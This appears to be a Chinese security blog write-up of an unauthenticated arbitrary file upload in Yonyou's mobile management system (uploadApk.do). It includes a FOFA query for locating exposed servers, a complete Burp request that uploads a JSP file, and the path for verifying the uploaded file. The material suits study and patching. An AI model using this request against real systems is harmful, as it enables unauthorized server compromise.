用友移动管理系统 任意文件上传漏洞[2023-HW]

用友移动管理系统 任意文件上传漏洞

  • 一、 产品简介
  • 二、 漏洞概述
  • 三、 复现环境
  • 四、 漏洞复现
    • 小龙POC检测脚本:
  • 五、 修复建议

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、 产品简介

用友移动系统管理是用友公司推出的一款移动办公解决方案,旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具,方便用户在移动设备上管理和处理企业的系统和业务。

二、 漏洞概述

用友移动管理系统 uploadApk.do 接口存在任意文件上传漏洞,未经授权攻击者通过漏洞上传任意文件,最终可以获取服务器权限。

三、 复现环境

FOFA语法:app=“用友-移动系统管理”

用友移动管理系统 任意文件上传漏洞[2023-HW]_第1张图片

四、 漏洞复现

burp poc验证

POST /maportal/appmanager/uploadApk.do?pk_obj= HTTP/1.1
Host: your-ip
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvLTG6zlX0gZ8LzO3
 
------WebKitFormBoundaryvLTG6zlX0gZ8LzO3
Content-Disposition: form-data; name="downloadpath"; filename="a.jsp"
Content-Type: application/msword
 
helloworld
------WebKitFormBoundaryvLTG6zlX0gZ8LzO3--

先发包验证,返还状态码必须是2成功,其他状态码不行

burp验证截图

用友移动管理系统 任意文件上传漏洞[2023-HW]_第2张图片
访问url验证是否有helloworld的存在

http://ip/maupload/apk/a.jsp

burp截图验证

用友移动管理系统 任意文件上传漏洞[2023-HW]_第3张图片

小龙POC检测脚本:

满江红

说明一下,由于监管强制要求,POC要等护网后才能开放

小龙POC传送门: 小龙POC工具
用友移动管理系统 任意文件上传漏洞[2023-HW]_第4张图片

五、 修复建议

关闭无用服务,文件转码

你可能感兴趣的:(2023年HW专题,网络安全漏洞复现,网络安全,python)